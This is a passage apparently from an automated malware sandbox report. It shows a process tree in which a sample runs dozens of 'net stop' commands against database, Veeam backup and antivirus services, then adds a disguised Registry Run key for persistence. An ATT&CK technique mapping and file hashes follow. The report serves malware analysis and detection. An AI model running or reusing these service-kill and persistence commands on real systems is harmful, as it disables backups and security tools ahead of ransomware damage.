      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2744
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y
      4⤵
      PID:720
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop SQLAgent$SYSTEM_BGC /y
    3⤵
    PID:868
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1532
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y
      4⤵
      PID:1040
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop SQLAgent$TPS /y
    3⤵
    PID:4976
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$TPS /y
      4⤵
      PID:4996
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop SQLAgent$TPSAMA /y
    3⤵
    PID:2604
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$TPSAMA /y
      4⤵
      PID:3220
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
    3⤵
    PID:4428
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
      4⤵
      PID:3792
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop SQLAgent$VEEAMSQL2012 /y
    3⤵
    PID:1468
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y
      4⤵
      PID:2508
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop SQLBrowser /y
    3⤵
    PID:2952
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4952
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLBrowser /y
      4⤵
      PID:3544
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop SQLSafeOLRService /y
    3⤵
    PID:4500
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2736
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLSafeOLRService /y
      4⤵
      PID:2020
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop SQLSERVERAGENT /y
    3⤵
    PID:2320
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLSERVERAGENT /y
      4⤵
      PID:1664
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop SQLTELEMETRY /y
    3⤵
    PID:2940
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLTELEMETRY /y
      4⤵
      PID:1896
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop SQLTELEMETRY$ECWDB2 /y
    3⤵
    PID:1652
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y
      4⤵
      PID:1648
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop SQLWriter /y
    3⤵
    PID:4396
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLWriter /y
      4⤵
      PID:1744
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop SstpSvc /y
    3⤵
    PID:1724
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SstpSvc /y
      4⤵
      PID:2424
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop svcGenericHost /y
    3⤵
    PID:4592
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop svcGenericHost /y
      4⤵
      PID:2672
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop swi_filter /y
    3⤵
    PID:4284
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop swi_filter /y
      4⤵
      PID:1988
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop swi_service /y
    3⤵
    PID:4860
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop swi_service /y
      4⤵
      PID:3676
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop swi_update_64 /y
    3⤵
    PID:4596
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop swi_update_64 /y
      4⤵
      PID:1080
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop TmCCSF /y
    3⤵
    PID:1136
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2500
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop TmCCSF /y
      4⤵
      PID:3032
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop tmlisten /y
    3⤵
    PID:4940
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop tmlisten /y
      4⤵
      PID:1008
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop TrueKey /y
    3⤵
    PID:3484
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2968
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop TrueKey /y
      4⤵
      PID:720
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop TrueKeyScheduler /y
    3⤵
    PID:2784
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop TrueKeyScheduler /y
      4⤵
      PID:4756
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop TrueKeyServiceHelper /y
    3⤵
    PID:3832
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop TrueKeyServiceHelper /y
      4⤵
      PID:4000
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop UI0Detect /y
    3⤵
    PID:4312
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop UI0Detect /y
      4⤵
      PID:2020
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop VeeamBackupSvc /y
    3⤵
    PID:2912
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:508
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamBackupSvc /y
      4⤵
      PID:2980
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop VeeamBrokerSvc /y
    3⤵
    PID:4788
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamBrokerSvc /y
      4⤵
      PID:3916
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop VeeamCatalogSvc /y
    3⤵
    PID:3648
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamCatalogSvc /y
      4⤵
      PID:3336
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop VeeamCloudSvc /y
    3⤵
    PID:4764
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1876
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamCloudSvc /y
      4⤵
      PID:1764
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop VeeamDeploymentService /y
    3⤵
    PID:2644
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamDeploymentService /y
      4⤵
      PID:2168
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop VeeamDeploySvc /y
    3⤵
    PID:2360
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamDeploySvc /y
      4⤵
      PID:2320
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop VeeamEnterpriseManagerSvc /y
    3⤵
    PID:812
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y
      4⤵
      PID:2332
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop VeeamMountSvc /y
    3⤵
    PID:3980
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1880
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamMountSvc /y
      4⤵
      PID:1132
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop VeeamNFSSvc /y
    3⤵
    PID:1628
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3448
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamNFSSvc /y
      4⤵
      PID:1436
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop VeeamRESTSvc /y
    3⤵
    PID:5004
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamRESTSvc /y
      4⤵
      PID:4000
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop VeeamTransportSvc /y
    3⤵
    PID:3556
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamTransportSvc /y
      4⤵
      PID:1692
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop W3Svc /y
    3⤵
    PID:2324
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop W3Svc /y
      4⤵
      PID:2356
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop wbengine /y
    3⤵
    PID:2276
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop wbengine /y
      4⤵
      PID:364
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop WRSVC /y
    3⤵
    PID:2288
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop WRSVC /y
      4⤵
      PID:3676
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop MSSQL$VEEAMSQL2008R2 /y
    3⤵
    PID:1744
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1364
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
      4⤵
      PID:3416
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
    3⤵
    PID:2708
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1444
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
      4⤵
      PID:3212
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop VeeamHvIntegrationSvc /y
    3⤵
    PID:4024
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1000
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y
      4⤵
      PID:4724
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop swi_update /y
    3⤵
    PID:5032
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1884
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop swi_update /y
      4⤵
      PID:2160
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop SQLAgent$CXDB /y
    3⤵
    PID:1864
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4532
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$CXDB /y
      4⤵
      PID:1836
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop SQLAgent$CITRIX_METAFRAME /y
    3⤵
    PID:4564
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y
      4⤵
      PID:4076
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop "SQL Backups" /y
    3⤵
    PID:2760
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3220
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQL Backups" /y
      4⤵
      PID:2292
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop MSSQL$PROD /y
    3⤵
    PID:2336
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$PROD /y
      4⤵
      PID:1800
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop "Zoolz 2 Service" /y
    3⤵
    PID:772
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Zoolz 2 Service" /y
      4⤵
      PID:5056
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop MSSQLServerADHelper /y
    3⤵
    PID:4336
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:872
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQLServerADHelper /y
      4⤵
      PID:4440
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop SQLAgent$PROD /y
    3⤵
    PID:3344
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3452
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$PROD /y
      4⤵
      PID:4524
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop msftesql$PROD /y
    3⤵
    PID:4572
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4216
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop msftesql$PROD /y
      4⤵
      PID:3136
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop NetMsmqActivator /y
    3⤵
    PID:3008
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4596
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop NetMsmqActivator /y
      4⤵
      PID:2964
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop EhttpSrv /y
    3⤵
    PID:4432
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4836
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop EhttpSrv /y
      4⤵
      PID:1268
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop ekrn /y
    3⤵
    PID:2408
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3760
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ekrn /y
      4⤵
      PID:4788
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop ESHASRV /y
    3⤵
    PID:1340
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4828
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ESHASRV /y
      4⤵
      PID:2912
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop MSSQL$SOPHOS /y
    3⤵
    PID:1036
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SOPHOS /y
      4⤵
      PID:1304
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop SQLAgent$SOPHOS /y
    3⤵
    PID:3116
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2280
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$SOPHOS /y
      4⤵
      PID:2440
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop AVP /y
    3⤵
    PID:4940
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1260
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop AVP /y
      4⤵
      PID:4604
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop klnagent /y
    3⤵
    PID:4356
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1300
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop klnagent /y
      4⤵
      PID:4064
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop MSSQL$SQLEXPRESS /y
    3⤵
    PID:3572
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4808
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y
      4⤵
      PID:4856
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop SQLAgent$SQLEXPRESS /y
    3⤵
    PID:2448
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y
      4⤵
      PID:2916
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop wbengine /y
    3⤵
    PID:4352
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2240
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop wbengine /y
      4⤵
      PID:2020
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop kavfsslp /y
    3⤵
    PID:4312
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2052
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop kavfsslp /y
      4⤵
      PID:1824
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop KAVFSGT /y
    3⤵
    PID:944
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2320
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop KAVFSGT /y
      4⤵
      PID:3304
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop KAVFS /y
    3⤵
    PID:2332
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop KAVFS /y
      4⤵
      PID:3336
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop mfefire /y
    3⤵
    PID:2372
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3676
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop mfefire /y
      4⤵
      PID:4768
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "svchos" /t REG_SZ /d "C:\users\Public\vVGbi.exe" /f
    3⤵
    PID:2724
  - - C:\Windows\system32\reg.exe
      REG ADD "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "svchos" /t REG_SZ /d "C:\users\Public\vVGbi.exe" /f
      4⤵
      Adds Run key to start application
      PID:2072

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
PID:3032

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
1⤵
PID:668

C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
1⤵
PID:1600

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4448

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
1⤵
PID:1624

C:\Windows\System32\sihclient.exe
C:\Windows\System32\sihclient.exe /cv XvScp95rikeKR7giSzVbjw.0.2
1⤵
PID:3336

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
- Suspicious use of FindShellTrayWindow
PID:26528
- C:\Windows\explorer.exe
  explorer.exe /LOADSAVEDWINDOWS
  2⤵
  - Boot or Logon Autostart Execution: Active Setup
  - Enumerates connected drives
  - Checks SCSI registry key(s)
  - Modifies registry class
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:3876

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:26608

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:12156

C:\Windows\explorer.exe
explorer.exe
1⤵
- Boot or Logon Autostart Execution: Active Setup
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:23016

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:9272

C:\Windows\explorer.exe
explorer.exe
1⤵
PID:9624

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:10124

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:15436

C:\Windows\explorer.exe
explorer.exe
1⤵
PID:12336

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:12696

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:12820

C:\Windows\explorer.exe
explorer.exe
1⤵
PID:5804

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:7632

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Windows Management Instrumentation

T1047

Persistence

Boot or Logon Autostart Execution

T1547

Active Setup

T1547.014

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Active Setup

T1547.014

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Direct Volume Access

T1006

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Network Share Discovery

T1135

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\7-Zip\7-zip.chm

Filesize
112KB

MD5
e6c0410ac25910949ec7c9409abcfb53

SHA1
bdfbff0fcf0c00e8569af6224d818856b5169e36

SHA256
5db8b8828eb2793877159a9ac97d2e7a66703fbbf4fe6ccfcc60b8e4a0d3dcd8

SHA512
9a9f0c7c00cb2bdd1c180e8c9752218cafc270e9283f8f5f9463d3ca4e33b77bfc2d782c9ff44985a363897fa365eb900c8fe1cee0432d1e2b89bcaa8342585f

Download Submit
C:\Program Files\7-Zip\7z.sfx

Filesize
209KB

MD5
e361139441922cf2dbe7578d84fbfd8c

SHA1
d8be73f69b5892e9b05e6f5368f324d80b7f3160

SHA256
0886772fea496eb811f21bd8430feff1c15f8d0c305611733176434ee5435756

SHA512
195b0994148424893002d9e1517ee26da258170e4f987d77d0e5b8b3d713a4c2430c2186aecf43f00f5c087e78a322995f9e2e2dcf1309a9f5d8cd40afa2a897

Download Submit
C:\Program Files\7-Zip\7zCon.sfx

Filesize
188KB

MD5
f05ceee282d5a137f173d1db7000f3e5

SHA1
8e0865e35c236e942e9cca0dc99c598891d824a0

SHA256
cc4982165a476d472e1da60c92c2730b4cd1b85640df9a0f023362d9ef883005

SHA512
7bfd2cbc0aba574f878143e0e5d56062fa454ea240da5aec733540498a21cf310c8ef32948332823381d75696ed649c8d5e45e5ee3c9c8f931d36d890cb7961e

Download Submit
C:\Program Files\7-Zip\History.txt

Filesize
57KB

MD5
ce4bca7f4a3998b594adab10fcea4840

SHA1
51b4016da1f16e1f1660d15c44900f10d6858247

SHA256
57d326cbfedc00d8a4a5731ba43fa3db016989c11dfb8026207351f21c01a201

SHA512
2968e968ea367eee8c0cd575bc9077d47091189b969e6faf81801c0077b5f61abc832407d20554d3d00c670c3f72005f16c08ed1060f48d7d19622fb63500bf2

Download Submit
C:\Program Files\7-Zip\Lang\af.txt

Filesize
5KB

MD5
54a99bfe557029f23477baec2fcdb82e

SHA1
067b6e1ae387a1ae5dabc031f9c8d9b4fc9b5867

SHA256
712bab80491c234bd1f8d9f734656f4e61efa28e20a8883052a639cf11f862d3

SHA512
2c5ead2ef3779495f3424d99e3f1313b5bb4998664aba8766accfed1d70e32a30ad8707dae941bcc5a5b63733f87a2965269979cacd566e32364b68dfd281b86

Download Submit
C:\Program Files\7-Zip\Lang\an.txt

Filesize
7KB

MD5
a7ad8d456d7620314d676d9fc0d8cb3f

SHA1
b6884101f9ce5b952f8b370d6bfb1654c4db01f4

SHA256
f08e6d83d10cb05961b49b95c7a00c1d5e776115fc8ca9446d4187b882a9fd19

SHA512
0ce885bdf84e30e4c05b42633e03c8be33b58515b77d953ca06e4bb1ece8db3e2a6f978dc3dfc297db0a06eb52b79797f09dd7c0fcf9e18b9a9f15d8a439115c

Download Submit
C:\Program Files\7-Zip\Lang\ar.txt

Filesize
12KB

MD5
9d658c40dff88f4bcbee0244aea7c3e8

SHA1
4a6936b16353fbd90af663dbe277e0c41b381bd8

SHA256
c6f9cf3dd62455586f63d7004775933551aed79eb68783b0dc73ae7c55a18c25

SHA512
56c6cf447bd841e043fc002899e07cc6e2e264db7c43614ce1ffb5570c3345f34c4b7b8d240daa4bad2c1f434c2d3db3d6fbd945209da3549ff3c2b5fbe2c6f4

Download Submit
C:\Program Files\7-Zip\Lang\ast.txt

Filesize
5KB

MD5
50083175dd675e446da0cd0b548a4480

SHA1
83a376e50698ac6b597c052bc1b16562ee20357b

SHA256
992167aeefd9757b9e2a3733d2b329f9ec0a86fca6db1df1c8aa033372c78992

SHA512
9b64c85d9bf466be8623097f3f6af93b1d7948eb3189951cddace90a6989ef4e2c47c8c949d3bf54c703ce42a1fc40a101f4aee98f9add65f7731403886668af

Download Submit
C:\Program Files\7-Zip\Lang\az.txt

Filesize
9KB

MD5
ed00fff154b0c742bed6837e65f0daff

SHA1
8b93764dd001b0a6a70d72a02673a1602c941990

SHA256
6189c33c5e7fe6f0194e4c0024fda03204f6b9f8597395c7c39d4bd4787ca5df

SHA512
afc4bd85fb6d185730e1efc07d48ea9efb53d3b3048b115fbde8ee9283105d641bc572f1ecb82eb87eadeafe76f98ffba73417e7ecc6715d759b5ef0661d4d7c

Download Submit
